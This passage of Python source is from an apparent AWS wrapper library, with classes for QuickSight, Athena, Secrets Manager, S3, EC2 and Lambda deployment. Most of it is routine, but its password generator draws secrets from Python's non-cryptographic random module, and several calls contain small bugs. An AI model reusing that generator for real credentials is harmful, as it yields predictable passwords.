max_status_checks=None, status_check_interval=None): source_account_id = source_account_id if source_account_id else self._sts.account_id source_template_arn = (f"arn:aws:quicksight:{self._session.region}:{source_account_id}:" f"template/{source_template_id}") if not publish_options: publish_options = { "AdHocFilteringOption": {"AvailabilityStatus": "ENABLED"}, "ExportToCSVOption": {"AvailabilityStatus": "DISABLED"}, "SheetControlsOption": {"VisibilityState": "EXPANDED"}, } args = dict( AwsAccountId=self._sts.account_id, DashboardId=dashboard_id, Name=name, SourceEntity={ "SourceTemplate": { "DataSetReferences": data_set_references, "Arn": source_template_arn, } }, DashboardPublishOptions=publish_options, ) try: dashboard = self.quicksight_client.describe_dashboard( AwsAccountId=self._sts.account_id, DashboardId=dashboard_id) self._logger.info("Updating quicksight dashboard: %s from template: %s", name, source_template_id) self.quicksight_client.update_dashboard(**args) self._logger.info("Publishing version: %s of dashboard: %s", dashboard["Dashboard"]["Version"]["VersionNumber"], name) self.quicksight_client.update_dashboard_published_version( AwsAccountId=self._sts.account_id, DashboardId=dashboard_id, VersionNumber=dashboard["Dashboard"]["Version"]["VersionNumber"]) if permissions: self._logger.info("Updating permissions for dashboard: %s", name) self.quicksight_client.update_dashboard_permissions( AwsAccountId=self._sts.account_id, DashboardId=dashboard_id, GrantPermissions=permissions, ) except self.quicksight_client.exceptions.ResourceNotFoundException: if permissions: args["Permissions"] = permissions self._logger.info("Creating dashboard: %s from template: %s", name, source_template_id) self.quicksight_client.create_dashboard(**args) max_status_checks = max_status_checks if max_status_checks else self._max_status_checks status_check_interval = status_check_interval if status_check_interval else self._status_check_interval # wait for stack "final" state 
status_check = 0 dashboard_version = self.quicksight_client.describe_dashboard( AwsAccountId=self._sts.account_id, DashboardId=dashboard_id).get("Dashboard").get("Version") while status_check < max_status_checks: status_check += 1 if dashboard_version["Status"].endswith("FAILED"): errors = ",".join([f"{error['Type']} - {error['Message']}" for error in dashboard_version["Errors"]]) self._logger.error("Dashboard: %s has known bad status: %s", name, dashboard_version["Status"]) self._logger.error("Error message(s): %s", errors) self._logger.error("Please fix the issue and try again.") return False elif dashboard_version["Status"] == "CREATION_SUCCESSFUL": self._logger.info("Dashboard: %s deployment complete", name) return True self._logger.debug("Dashboard: %s status is: %s", name, dashboard_version["Status"]) self._logger.debug("Waiting...") if status_check >= max_status_checks: raise RuntimeError("Timed out waiting for QuickSight dashboard to deploy") time.sleep(status_check_interval) dashboard_version = self.quicksight_client.describe_dashboard( AwsAccountId=self._sts.account_id, DashboardId=name).get("Dashboard").get("Version") self._logger.info("Publishing version: %s of dashboard: %s", dashboard_version["VersionNumber"], name) self.quicksight_client.update_dashboard_published_version( AwsAccountId=self._sts.account_id, DashboardId=dashboard_id, VersionNumber=dashboard_version["VersionNumber"], ) def create_or_update_athena_data_source(self, name, permissions=None): data_source = dict( AwsAccountId=self._sts.account_id, DataSourceId=name, Name=name, Type="ATHENA", DataSourceParameters={"AthenaParameters": {"WorkGroup": "primary"}}) if permissions: data_source["Permissions"] = permissions try: self.quicksight_client.describe_data_source(AwsAccountId=self._sts.account_id, DataSourceId=name) self._logger.info("Updating granted permissions for data source: %s", name) self.quicksight_client.update_data_source_permissions( AwsAccountId=data_source["AwsAccountId"], 
DataSourceId=data_source["DataSourceId"], GrantPermissions=data_source["Permissions"]) del data_source["Type"] del data_source["Permissions"] self._logger.info("Updating data source: %s", name) data_source_arn = self.quicksight_client.update_data_source(**data_source).get("Arn") self._wait_for_data_source_status(name, "UPDATE_SUCCESSFUL") except self.quicksight_client.exceptions.ResourceNotFoundException: self._logger.info("Creating data source: %s", name) data_source_arn = self.quicksight_client.create_data_source(**data_source).get("Arn") self._wait_for_data_source_status(name, "CREATION_SUCCESSFUL") return data_source_arn def create_or_update_athena_sql_data_set( self, name, sql, data_source_arn, columns, permissions=None, logical_table_map=None): data_set = { "AwsAccountId": self._sts.account_id, "DataSetId": name, "Name": name, "PhysicalTableMap": { name: { "CustomSql": { "DataSourceArn": data_source_arn, "Name": name, "SqlQuery": sql, "Columns": columns, } } }, "ImportMode": "SPICE", } if permissions: data_set["Permissions"] = permissions if logical_table_map: data_set["LogicalTableMap"] = logical_table_map try: self.quicksight_client.describe_data_set( AwsAccountId=self._sts.account_id, DataSetId=name ) self._logger.info("Updating granted permissions for data set: %s", name) if permissions: self.quicksight_client.update_data_set_permissions( AwsAccountId=data_set["AwsAccountId"], DataSetId=data_set["DataSetId"], GrantPermissions=data_set["Permissions"], ) del data_set["Permissions"] self._logger.info("Updating data set: %s", name) return self.quicksight_client.update_data_set(**data_set).get("Arn") except self.quicksight_client.exceptions.ResourceNotFoundException: self._logger.info("Creating data set: %s", name) return self.quicksight_client.create_data_set(**data_set) def create_or_update_group(self, name): try: self.quicksight_client.describe_group(AwsAccountId=self._sts.account_id, GroupName=name, Namespace="default") self._logger.warning("Updating 
quicksight groups is not currently supported; perhaps relevant when " "non-default namespaces are supported upstream") except self.quicksight_client.exceptions.ResourceNotFoundException: self._logger.info("Creating quicksight group: %s", name) return self.quicksight_client.create_group( AwsAccountId=self._sts.account_id, GroupName=name, Namespace="default") def delete_analysis_template(self, template_id): try: self.quicksight_client.describe_template(AwsAccountId=self._sts.account_id, TemplateId=template_id) self._logger.info("Deleting quicksight analysis template: %s", template_id) return self.quicksight_client.delete_template(AwsAccountId=self._sts.account_id, TemplateId=template_id) except self.quicksight_client.exceptions.ResourceNotFoundException: pass def delete_data_set(self, data_set_id): try: self.quicksight_client.describe_data_set(AwsAccountId=self._sts.account_id, DataSetId=data_set_id) self._logger.info("Deleting quicksight data set: %s", data_set_id) return self.quicksight_client.delete_data_set(AwsAccountId=self._sts.account_id, DataSetId=data_set_id) except self.quicksight_client.exceptions.ResourceNotFoundException: pass def delete_data_source(self, name): try: self.quicksight_client.describe_data_source(AwsAccountId=self._sts.account_id, DataSourceId=name) self._logger.info("Deleting data source: %s", name) return self.quicksight_client.delete_data_source(AwsAccountId=self._sts.account_id, DataSourceId=name) except self.quicksight_client.exceptions.ResourceNotFoundException: pass def delete_dashboard(self, name): try: self.quicksight_client.describe_dashboard(AwsAccountId=self._sts.account_id, DashboardId=name) self._logger.info("Deleting dashboard: %s", name) return self.quicksight_client.delete_dashboard(AwsAccountId=self._sts.account_id, DashboardId=name) except self.quicksight_client.exceptions.ResourceNotFoundException: pass def get_admin_principal_arns(self): # get the largest chunk of users possible according to AWS API limits max_results = 
100 quicksight_users = list() account_id = self._sts.account_id self._logger.debug("Reading first chunk of quicksight users") users_chunk = self.quicksight_client.list_users( AwsAccountId=self._sts.account_id, MaxResults=max_results, Namespace="default") quicksight_users.extend(users_chunk.get("UserList")) while users_chunk.get("NextToken"): self._logger.debug("Reading next chunk of quicksight users") users_chunk = self.quicksight_client.list_users( AwsAccountId=account_id, NextToken=users_chunk.get("NextToken"), MaxResults=max_results, Namespace="default") quicksight_users.extend(users_chunk.get("UserList")) return [user["Arn"] for user in quicksight_users if user["Role"] == "ADMIN" and user["Arn"] != "N/A"] def get_data_set_arn(self, name): try: return self.quicksight_client.describe_data_set( AwsAccountId=self._sts.account_id, DataSetId=name).get("DataSet").get("Arn") except self.quicksight_client.exceptions.ResourceNotFoundException: self._logger.warning("Could not find data set with ID: %s", name) return "" def get_group_arn(self, name): try: return self.quicksight_client.describe_group( AwsAccountId=self._sts.account_id, GroupName=name, Namespace="default").get("Group").get("Arn") except self.quicksight_client.exceptions.ResourceNotFoundException: self._logger.warning("Could not find group with name: %s", name) return "" def list_analysis_templates(self): # get the largest chunk of analysis templates possible according to AWS API limits max_results = 100 analysis_templates = list() account_id = self._sts.account_id self._logger.debug("Reading first chunk of quicksight analysis templates") analysis_template_chunk = self.quicksight_client.list_templates( AwsAccountId=self._sts.account_id, MaxResults=max_results) analysis_templates.extend(analysis_template_chunk.get("TemplateSummaryList")) while analysis_template_chunk.get("NextToken"): self._logger.debug("Reading next chunk of quicksight analysis templates") analysis_template_chunk = 
self.quicksight_client.list_templates( AwsAccountId=account_id, NextToken=analysis_template_chunk.get("NextToken"), MaxResults=max_results) analysis_templates.extend(analysis_template_chunk.get("TemplateSummaryList")) return analysis_templates def list_dashboards(self): # get the largest chunk of dashboards possible according to AWS API limits max_results = 100 dashboards = list() account_id = self._sts.account_id self._logger.debug("Reading first chunk of quicksight dashboards") dashboard_chunk = self.quicksight_client.list_dashboards( AwsAccountId=self._sts.account_id, MaxResults=max_results) dashboards.extend(dashboard_chunk.get("DashboardSummaryList")) while dashboard_chunk.get("NextToken"): self._logger.debug("Reading next chunk of quicksight dashboards") dashboard_chunk = self.quicksight_client.list_dashboards( AwsAccountId=account_id, NextToken=dashboard_chunk.get("NextToken"), MaxResults=max_results) dashboards.extend(dashboard_chunk.get("DashboardSummaryList")) return dashboards def list_data_sets(self): # get the largest chunk of data sets possible according to AWS API limits max_results = 100 data_sets = list() account_id = self._sts.account_id self._logger.debug("Reading first chunk of quicksight data sets") data_set_chunk = self.quicksight_client.list_data_sets( AwsAccountId=self._sts.account_id, MaxResults=max_results) data_sets.extend(data_set_chunk.get("DataSetSummaries")) while data_set_chunk.get("NextToken"): self._logger.debug("Reading next chunk of quicksight data sets") data_set_chunk = self.quicksight_client.list_data_sets( AwsAccountId=account_id, NextToken=data_set_chunk.get("NextToken"), MaxResults=max_results) data_sets.extend(data_set_chunk.get("DataSetSummaries")) return data_sets def list_data_sources(self): # get the largest chunk of data sources possible according to AWS API limits max_results = 100 data_sources = list() account_id = self._sts.account_id self._logger.debug("Reading first chunk of quicksight data sources") 
data_source_chunk = self.quicksight_client.list_data_sources( AwsAccountId=self._sts.account_id, MaxResults=max_results) data_sources.extend(data_source_chunk.get("DataSources")) while data_source_chunk.get("NextToken"): self._logger.debug("Reading next chunk of quicksight data sources") data_source_chunk = self.quicksight_client.list_data_sources( AwsAccountId=account_id, NextToken=data_source_chunk.get("NextToken"), MaxResults=max_results) data_sources.extend(data_source_chunk.get("DataSources")) return data_sources def set_template_permissions(self, template_id, permissions): return self.quicksight_client.update_template_permissions( AwsAccountId=self._sts.account_id, TemplateId=template_id, GrantPermissions=permissions) def update_template_permissions(self, name, permissions): self._logger.info("Updating permissions on quicksight template: %s", name) self.quicksight_client.update_template_permissions( AwsAccountId=self._sts.account_id, TemplateId=name, GrantPermissions=permissions) <file_sep>from madeira import session from madeira_utils import loggers class RdsCluster(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self.rds_client = self._session.session.client('rds') def disable_cluster_termination_protection(self, cluster_id): return self.rds_client.modify_db_cluster( DBClusterIdentifier=cluster_id, DeletionProtection=False) # TODO: find usage and replace with list_clusters def get_clusters(self): return self.rds_client.describe_db_clusters() # TODO: list_global_clusters (consistency) def get_global_clusters(self): return self.rds_client.describe_global_clusters() # TODO: list_instances (consistency) def get_instances(self): return self.rds_client.describe_db_instances() def list_clusters(self): return self.rds_client.describe_db_clusters().get('DBClusters') <file_sep>from madeira import 
kms, sts, session from madeira_utils import loggers import time class Athena(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self._sts = sts.Sts(logger=logger, profile_name=profile_name, region=region) self.athena_client = self._session.session.client('athena') self._kms = kms.Kms(logger=logger, profile_name=profile_name, region=region) self._logger = logger if logger else loggers.get_logger() self._max_query_checks = 10 self._interval = 3 def _get_default_output_location(self): return (f'aws-athena-query-results-{self._sts.account_id}-' f'{self._session.region}') def execute_query(self, database, sql, output_location=None, workgroup='primary'): if not output_location: output_location = self._get_default_output_location() self._logger.debug('Executing query: %s', sql) execution_id = self.athena_client.start_query_execution( QueryString=sql, QueryExecutionContext={'Database': database}, ResultConfiguration={'OutputLocation': output_location}, WorkGroup=workgroup ).get('QueryExecutionId') self._logger.debug('Query execution ID: %s', execution_id) # wait for query to complete and validate status # TODO: let waiting parameters be overridden at the method level for i in range(0, self._max_query_checks): execution_status = self.athena_client.get_query_execution( QueryExecutionId=execution_id).get('QueryExecution').get('Status') execution_state = execution_status.get('State') execution_state_reason = execution_status.get('StateChangeReason') if execution_state == 'SUCCEEDED': self._logger.info('Query %s successful', execution_id) break elif execution_state == 'FAILED': self._logger.critical('Query %s failed', execution_id) self._logger.critical('Reason: %s', execution_state_reason) break elif execution_state == 'CANCELLED': self._logger.error('Query %s was cancelled - human intervention?', 
execution_id) break time.sleep(self._interval) def update_workgroup(self, results_bucket=None, workgroup='primary', description='', requester_pays=False, publish_cloudwatch=True, kms_key='alias/aws/s3'): if not results_bucket: results_bucket = self._get_default_output_location() # athena's API doesn't understand KMS key aliases, so we'll look up the ARN if kms_key == 'alias/aws/s3': self._logger.info('Looking up KMS key ARN for key: %s', kms_key) kms_key = self._kms.get_key(kms_key)['KeyMetadata']['Arn'] self._logger.info('Got ARN: %s', kms_key) self._logger.info('Updating Athena default Workgroup configuration') return self.athena_client.update_work_group( WorkGroup=workgroup, Description=description, ConfigurationUpdates={ 'EnforceWorkGroupConfiguration': True, 'ResultConfigurationUpdates': { 'OutputLocation': f's3://{results_bucket}/', 'EncryptionConfiguration': { 'EncryptionOption': 'SSE_KMS', 'KmsKey': kms_key }, }, 'PublishCloudWatchMetricsEnabled': publish_cloudwatch, 'RequesterPaysEnabled': requester_pays }, State='ENABLED' ) <file_sep>import base64 import json import random import string from madeira import session from madeira_utils import loggers class SecretsManager(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self.secrets_manager_client = self._session.session.client(service_name="secretsmanager") @staticmethod def generate_clean_password(size=32, chars=string.ascii_letters + string.digits): """Generates a password free of special characters.""" return "".join(random.choice(chars) for _ in range(size)) def get_secret(self, secret_name): try: get_secret_value_response = self.secrets_manager_client.get_secret_value(SecretId=secret_name) except self.secrets_manager_client.exceptions.ResourceNotFoundException: self._logger.error("%s: secret does not exist", secret_name) return None 
        # string secrets are stored as JSON documents; binary secrets arrive
        # base64-encoded from the API
        if "SecretString" in get_secret_value_response:
            secret = json.loads(get_secret_value_response.get("SecretString", "{}"))
        else:
            secret = base64.b64decode(get_secret_value_response["SecretBinary"])

        return secret

    def store_secret(self, secret_name, secret_description, secret):
        # Creates a brand-new secret; `secret` may be any JSON-serializable structure.
        # NOTE(review): create_secret fails if a secret with this name already
        # exists -- callers appear expected to use update_secret in that case.
        return self.secrets_manager_client.create_secret(
            Name=secret_name,
            Description=secret_description,
            SecretString=json.dumps(secret),
        )

    def update_secret(self, secret_name, secret):
        # Overwrites the value of an existing secret with the JSON-serialized `secret`.
        return self.secrets_manager_client.update_secret(
            SecretId=secret_name,
            SecretString=json.dumps(secret),
        )
<file_sep>from collections import OrderedDict
from datetime import date, datetime, timedelta
import json
import re

from madeira import session, sts
from madeira_utils import loggers, utils


class S3(object):
    # Convenience wrapper around the S3 and S3 Control APIs.

    def __init__(self, logger=None, profile_name=None, region=None):
        self._logger = logger if logger else loggers.get_logger()
        self._session = session.Session(logger=logger, profile_name=profile_name, region=region)
        self._sts = sts.Sts(logger=logger, profile_name=None, region=None)
        self.s3_client = self._session.session.client("s3")
        self.s3_control_client = self._session.session.client("s3control")
        self.s3_resource = self._session.session.resource("s3")

    @staticmethod
    def _get_retention_end_date(retain_years=7):
        # Returns "now + retain_years" as the object-lock retention end date.
        # The except branch handles a Feb 29 "today": replace() raises
        # ValueError when the target year is not a leap year, so fall back to
        # adding the day-count difference between the two years.
        date_today = datetime.utcnow()
        try:
            return date_today.replace(year=date_today.year + retain_years)
        except ValueError:
            return date_today + (
                date(date_today.year + retain_years, 1, 1) - date(date_today.year, 1, 1)
            )

    def create_folders(self, bucket_name, folders):
        # create a set of "folders" (really, a pre-provisioned set of empty objects which represent S3 object
        # prefixes) which will provide the ability for external applications (i.e. RedPoint Interaction, AWS Console)
        # to "browse" the S3 bucket as if it were a filesystem with a bunch of empty folders.
folder_objects = self.get_folder_objects(folders) folder_object_keys = list(folder_objects.keys()) for key in folder_object_keys: try: self.get_object(bucket_name, key) self._logger.debug( "Skipping folder object: %s since it already exists", key ) del folder_objects[key] except self.s3_client.exceptions.NoSuchKey: continue self.create_objects(bucket_name, folder_objects) def create_objects(self, bucket_name, objects): for object_key, value in objects.items(): self._logger.info("Creating s3://%s/%s", bucket_name, object_key) self.s3_resource.Object(bucket_name, object_key).put(Body=value) def delete_object(self, bucket_name, object_key): self._logger.debug("Deleting s3://%s/%s", bucket_name, object_key) self.s3_client.delete_object(Bucket=bucket_name, Key=object_key) def delete_objects(self, bucket_name, object_keys): chunk_size = 1000 for i in range(0, len(object_keys), chunk_size): chunk = object_keys[i: i + chunk_size] object_list = { "Objects": [{"Key": object_key["Key"]} for object_key in chunk], "Quiet": True, } self.s3_client.delete_objects(Bucket=bucket_name, Delete=object_list) return len(object_keys) def delete_object_versions(self, bucket_name, object_keys): chunk_size = 1000 for i in range(0, len(object_keys), chunk_size): chunk = object_keys[i: i + chunk_size] object_list = { "Objects": [{"Key": object_key["Key"], "VersionId": object_key["VersionId"]} for object_key in chunk], "Quiet": True, } self.s3_client.delete_objects(Bucket=bucket_name, Delete=object_list, BypassGovernanceRetention=True) return len(object_keys) def does_bucket_exist(self, bucket_name): try: self.s3_resource.meta.client.head_bucket(Bucket=bucket_name) return True except self.s3_client.exceptions.ClientError as e: error_code = e.response.get("Error", {}).get("Code") if error_code == "403": # bucket exists, but we don't have permissions to it return True elif error_code == "404": return False else: raise e def get_all_buckets(self): return [bucket["Name"] for bucket in 
self.s3_client.list_buckets().get("Buckets")] def get_all_object_keys(self, bucket, prefix=""): """ Returns all s3 keys (objects) in the named bucket as a list of boto.s3.key.Key objects. """ paginator = self.s3_client.get_paginator("list_objects") page_iterator = paginator.paginate(Bucket=bucket, Prefix=prefix) try: return [key for page in page_iterator for key in page.get("Contents", [])] except self.s3_client.exceptions.NoSuchBucket: self._logger.warning("Bucket: %s does not exist", bucket) def get_all_object_versions(self, bucket, prefix=""): """ Returns all s3 keys (object versions) in the named bucket as a list of boto.s3.key.Key objects. """ # seemingly, pagination wrappers don't work for "list_object_versions" even though they're supported object_list = [] try: response = self.s3_client.list_object_versions(Bucket=bucket, Prefix=prefix) except self.s3_client.exceptions.NoSuchBucket: self._logger.warning("Bucket: %s does not exist", bucket) return object_list object_list.extend(response.get('Versions', [])) object_list.extend(response.get('DeleteMarkers', [])) # per https://docs.aws.amazon.com/AmazonS3/latest/dev/list-obj-version-enabled-bucket.html while response.get('KeyMarker') or response.get('VersionIdMarker'): response = self.s3_client.list_object_versions( KeyMarker=response['KeyMarker'], VersionIdMarker=response['VersionIdMarker']) object_list.extend(response.get('Versions', [])) object_list.extend(response.get('DeleteMarkers', [])) return object_list @staticmethod def get_folder_object_key(folder): return f"{folder}/.folder" def get_folder_objects(self, folder_list): """Get list of S3 'folder' object keys from a list of folders that may contain blanks, dupes, or comments.""" folder_objects = OrderedDict() folder_list = sorted(folder_list) for folder in folder_list: folder = folder.strip() if not folder: continue if folder.startswith("#"): continue object_key = self.get_folder_object_key(folder) folder_objects[object_key] = "" return folder_objects 
def get_object(self, bucket, object_key): try: self._logger.debug('Loading s3://%s/%s', bucket, object_key) return self.s3_client.get_object(Bucket=bucket, Key=object_key) except self.s3_client.exceptions.NoSuchKey: self._logger.debug("Object not found: s3://%s/%s", bucket, object_key) raise def get_object_contents(self, bucket, object_key, is_json=False): object_body = self.get_object(bucket, object_key).get('Body').read().decode('utf-8') return json.loads(object_body) if is_json else object_body def get_object_md5_base64(self, bucket_name, object_key): try: source_object = self.s3_client.get_object(Bucket=bucket_name, Key=object_key) return utils.get_base64_sum_of_stream(source_object.get("Body"), hash_type='md5') except self.s3_client.exceptions.NoSuchKey: return '' def get_old_object_keys(self, bucket, max_age_hours=24, prefix=""): """ Returns all s3 keys (objects) older than max-age hours in the named bucket as a list of boto.s3.key.Key objects. """ past_time_at_max_age = datetime.now() - timedelta(hours=max_age_hours) paginator = self.s3_client.get_paginator("list_objects") page_iterator = paginator.paginate(Bucket=bucket, Prefix=prefix) bucket_object_list = [] for page in page_iterator: for key in page.get("Contents", []): if key["LastModified"].replace(tzinfo=None) < past_time_at_max_age: bucket_object_list.append(key) return bucket_object_list def put_object(self, bucket_name, object_key, body, encoding="utf-8", md5=None, as_json=False, content_type=None): if as_json: body = json.dumps(body) object_args = dict(Bucket=bucket_name, Key=object_key, Body=body, ContentEncoding=encoding) # user-attested object checksums must be base64-encoded for submission to S3. 
See also: # https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/s3.html#S3.Client.put_object if md5: object_args["ContentMD5"] = md5 if content_type: object_args["ContentType"] = content_type self._logger.info("Uploading s3://%s/%s", bucket_name, object_key) return self.s3_client.put_object(**object_args) def rename_object(self, bucket_name, source_key, dest_key): self._logger.debug("Renaming %s to %s in bucket: %s", source_key, dest_key, bucket_name) self.s3_resource.Object(bucket_name, dest_key).copy_from(CopySource=f"{bucket_name}/{source_key}") self.s3_resource.Object(bucket_name, source_key).delete() return True def set_no_public_access_on_account(self): self._logger.info( "Blocking all public access attributes for all future bucket creation in account: %s", self._sts.account_id) return self.s3_control_client.put_public_access_block( PublicAccessBlockConfiguration={ "BlockPublicAcls": True, "IgnorePublicAcls": True, "BlockPublicPolicy": True, "RestrictPublicBuckets": True, }, AccountId=self._sts.account_id ) def set_object_lock(self, bucket_name, object_key, retention_mode, retention_years): self._logger.info("Placing retention-based lock on: %s", bucket_name, object_key) return self.s3_client.put_object_retention( Bucket=bucket_name, Key=object_key, Retention={ "Mode": retention_mode, "RetainUntilDate": self._get_retention_end_date(retention_years), } ) def sync_files(self, bucket, files): changed_files = [] for file in files: result = self.upload_asset_if_changed(bucket, file['name'], file['root']) if result: changed_files.append(result) return changed_files def upload_asset_if_changed(self, bucket, file, root): key_prefix = re.sub('^assets/*', '', root) if key_prefix: key_prefix += '/' object_key = f"{key_prefix}{file}" local_path = f"{root}/{file}" binary = False if file.endswith('.html'): content_type = 'text/html' elif file.endswith('.css'): content_type = 'text/css' elif file.endswith('.js'): content_type = 'text/javascript' elif 
file.endswith('.ico'): binary = True content_type = 'image/x-icon' elif file.endswith('.png'): binary = True content_type = 'image/png' elif file.endswith('.jpg') or file.endswith('jpeg'): binary = True content_type = 'image/jpeg' else: content_type = 'text/plain' self._logger.debug("%s: processing as %s; binary=%s", local_path, content_type, binary) base64_md5_local = utils.get_base64_sum_of_file(local_path, hash_type='md5') self._logger.debug("%s: Local copy base64 md5: %s", local_path, base64_md5_local) base64_md5_in_s3 = self.get_object_md5_base64(bucket, object_key) self._logger.debug("%s: S3 object base64 md5: %s", local_path, base64_md5_in_s3) if base64_md5_local == base64_md5_in_s3: self._logger.info('Checksums of local and S3 copies of %s are identical; skipping', local_path) return False self.put_object(bucket, object_key, utils.get_file_content(local_path, binary=binary), content_type=content_type) return object_key <file_sep>from madeira import session from madeira_utils import loggers class Logs(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self.logs_client = self._session.session.client('logs') def get_log_groups(self): return self.logs_client.describe_log_groups().get('logGroups') def delete_log_group(self, log_group): return self.logs_client.delete_log_group(logGroupName=log_group) <file_sep>from madeira import session from madeira_utils import loggers class Ec2(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self.ec2_client = self._session.session.client("ec2") def assure_key_pair(self, key_name, key_material): try: self.ec2_client.describe_key_pairs(KeyNames=[key_name]) self._logger.info("Key pair with 
already exists with name: %s", key_name) except self.ec2_client.exceptions.ClientError as e: if "does not exist" in str(e): self._logger.info("Importing SSH public key as: %s", key_name) self.ec2_client.import_key_pair( KeyName=key_name, PublicKeyMaterial=key_material ) else: raise def delete_key_pair(self, key_name): self._logger.info("Deleting EC2 key pair: %s", key_name) self.ec2_client.delete_key_pair(KeyName=key_name) def disable_termination_protection(self, instance_id): return self.ec2_client.modify_instance_attribute( InstanceId=instance_id, DisableApiTermination={"Value": False} ) def list_instances(self): return self.ec2_client.describe_instances().get("Reservations") <file_sep>import time from madeira_utils import hashing, loggers, utils from madeira import session, sts class AwsLambda: def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self._sts = sts.Sts(logger=logger, profile_name=None, region=None) self.lambda_client = self._session.session.client('lambda') def _create_function(self, name, role, function_file_path, description='', vpc_config=None, memory_size=128, timeout=30, reserved_concurrency=None, layer_arns=None, runtime='python3.8', handler='handler.handler'): layer_arns = layer_arns if layer_arns else [] vpc_config = vpc_config if vpc_config else {} self._logger.info('Deploying function: %s from file: %s', name, function_file_path) try: function_arn = self.lambda_client.create_function( FunctionName=name, Runtime=runtime, Role=role, Handler=handler, Code={'ZipFile': utils.get_zip_content(function_file_path)}, Description=description, Timeout=timeout, Layers=layer_arns, MemorySize=memory_size, Publish=True, VpcConfig=vpc_config).get('FunctionArn') except self.lambda_client.exceptions.ResourceConflictException: self._logger.warning('Function: %s already exists', name) function_arn = 
self.lambda_client.get_function(FunctionName=name).get('Configuration').get('FunctionArn') if reserved_concurrency: self._set_reserved_concurrency(name, reserved_concurrency) return function_arn def _set_reserved_concurrency(self, name, reserved_concurrency): if reserved_concurrency: self._logger.info('setting reserved concurrency to %s on function %s', reserved_concurrency, name) self.lambda_client.put_function_concurrency( FunctionName=name, ReservedConcurrentExecutions=reserved_concurrency) def _update_function(self, name, role, function_file_path, description='', vpc_config=None, memory_size=128, timeout=30, reserved_concurrency=None, layer_arns=None, runtime='python-3.8', handler='handler.handler'): layer_arns = layer_arns if layer_arns else [] vpc_config = vpc_config if vpc_config else {} self._logger.info('%s: updating lambda function code', name) self.lambda_client.update_function_code( FunctionName=name, ZipFile=utils.get_zip_content(function_file_path), Publish=True ) self._logger.info('%s: updating lambda function configuration', name) self.lambda_client.update_function_configuration( FunctionName=name, Runtime=runtime, Role=role, Handler=handler, Description=description, VpcConfig=vpc_config, Timeout=timeout, MemorySize=memory_size, Layers=layer_arns ) if reserved_concurrency: self._set_reserved_concurrency(name, reserved_concurrency) def _wait_for_availability(self, function_arn): max_status_checks = 10 status_check_interval = 20 # wait for stack "final" state status_check = 0 finished_status = 'Active' while status_check < max_status_checks: status_check += 1 lambda_function = self.lambda_client.get_function(FunctionName=function_arn) if lambda_function['Configuration']['State'] == finished_status: self._logger.debug( "Lambda function %s is now: %s", lambda_function["Configuration"]["FunctionName"], finished_status ) return self._logger.debug( "Lambda function: %s status is: %s - waiting for status: %s", 
lambda_function["Configuration"]["FunctionName"], lambda_function['Configuration']['State'], finished_status) if status_check >= max_status_checks: raise RuntimeError( "Timed out waiting for lambda function: %s to be available", lambda_function["Configuration"]["FunctionName"]) time.sleep(status_check_interval) def add_permission_for_s3_bucket(self, name, bucket): self.remove_permission_for_s3_bucket(name, bucket) self._logger.info('Allowing invocation of function: %s based on events from S3 bucket: %s', name, bucket) self.lambda_client.add_permission( Action='lambda:InvokeFunction', FunctionName=name, Principal='s3.amazonaws.com', SourceAccount=self._sts.account_id, SourceArn=f'arn:aws:s3:::{bucket}', StatementId=f'permission_for_{bucket}' ) def create_or_update_function(self, name, role, function_file_path, description='', vpc_config=None, memory_size=128, timeout=30, reserved_concurrency=None, layers=None, runtime='python3.8', handler='handler.handler'): if layers: layer_arns = [layer_meta['arn'] for name, layer_meta in layers.items()] layers_updated = [name for name, layer_meta in layers.items() if layer_meta['updated']] else: layer_arns = [] layers_updated = [] try: lambda_function = self.lambda_client.get_function(FunctionName=name) self._logger.debug('%s: lambda function: already exists; checking on updates', name) function_arn = lambda_function['Configuration']['FunctionArn'] existing_layers = [layer['Arn'] for layer in lambda_function['Configuration']['Layers']] added_layers = [layer_arn for layer_arn in layer_arns if layer_arn not in existing_layers] removed_layers = [layer_arn for layer_arn in existing_layers if layer_arn not in layer_arns] # Calculate the SHA256 checksum of the file (whether a zip file or not) file_sha256_string = utils.get_base64_sum_of_file(function_file_path) if function_file_path.endswith('.zip'): aws_file_sha256_string = lambda_function.get('Configuration').get('CodeSha256') else: # AWS stores lambdas in zip files in a "hidden" S3 
bucket - we need to extract the handler as-stored # in S3 in order to compare it to our local file. This reads the whole encapsulating zip in memory; # we're assuming all lambdas stay relatively small aws_file_sha256_string = utils.get_base64_sum_of_file_in_zip_from_url( lambda_function.get('Code').get('Location'), 'handler.py') if file_sha256_string != aws_file_sha256_string: self._logger.info('%s: updating lambda function for intrinsic code change', name) elif layers_updated: self._logger.info( '%s: updating lambda only for code changed in related layers: %s', name, layers_updated) elif added_layers or removed_layers: if added_layers: self._logger.info('%s: updating lambda function for added layers: %s', name, added_layers) if removed_layers: self._logger.info('%s: updating lambda function for removed layers: %s', name, removed_layers) else: self._logger.info('%s: no lambda function code nor related layer changes; no update required', name) return function_arn self._update_function( name, role, function_file_path, description=description, vpc_config=vpc_config, memory_size=memory_size, timeout=timeout, reserved_concurrency=reserved_concurrency, layer_arns=layer_arns, runtime=runtime, handler=handler) except self.lambda_client.exceptions.ResourceNotFoundException: self._logger.info('Function: %s does not yet exist', name) function_arn = self._create_function( name, role, function_file_path, description=description, vpc_config=vpc_config, memory_size=memory_size, timeout=timeout, reserved_concurrency=reserved_concurrency, layer_arns=layer_arns, runtime=runtime, handler=handler) # VPC-scoped lambdas sometimes take more time to spin up, so we wait for their final state if vpc_config: self._wait_for_availability(function_arn) return function_arn def delete_function(self, name, qualifier=None): args = {'FunctionName': name} if qualifier: args['Qualifier'] = qualifier try: self.lambda_client.delete_function(**args) self._logger.info('Function: %s deleted', name) except 
